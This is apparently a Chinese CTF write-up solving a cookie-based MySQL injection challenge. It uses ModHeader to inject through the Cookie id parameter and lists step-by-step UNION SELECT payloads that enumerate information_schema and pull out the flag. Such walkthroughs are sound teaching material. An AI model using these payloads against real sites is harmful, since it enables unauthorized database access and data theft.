点击此处获得更好的阅读体验
WriteUp来源
来自qawsaq原创投稿
题目考点
对SQL注入的理解
MySQL手工注入
解题思路
本题使用到的工具:FireFox浏览器插件:ModHeader
根据页面提示,可得知本题可以通过Cookie请求进行注入
通过ModHeader添加Cookie id=1 判断提交是否成功
页面返回
在id=1后加order by 1 来判断有几个字段,在修改到order by 2之前是正常,之后就会出问题了。说明只有两个字段
查看页面回显位,发现1,2都可以进行回显
1 | id=-1 union select 1,2 |
开始注入,获取数据库版本和数据库名
1 | id=-1 union select version(),database() |
因为数据库版本大于5.0,所以我们可以通过查询information_schema表来获取表名和列名,获得表名称为gdctsoiitj
1 | id=-1 union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli' |
得到表名后,继续查询列名,获得列名称为zrxzhzkosa
1 | id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='gdctsoiitj' |
8.得到列名后,查询数据得到flag,需要注意这题的表名和列名每个环境都不一样
1 | id=-1 union select zrxzhzkosa,2 from gdctsoiitj |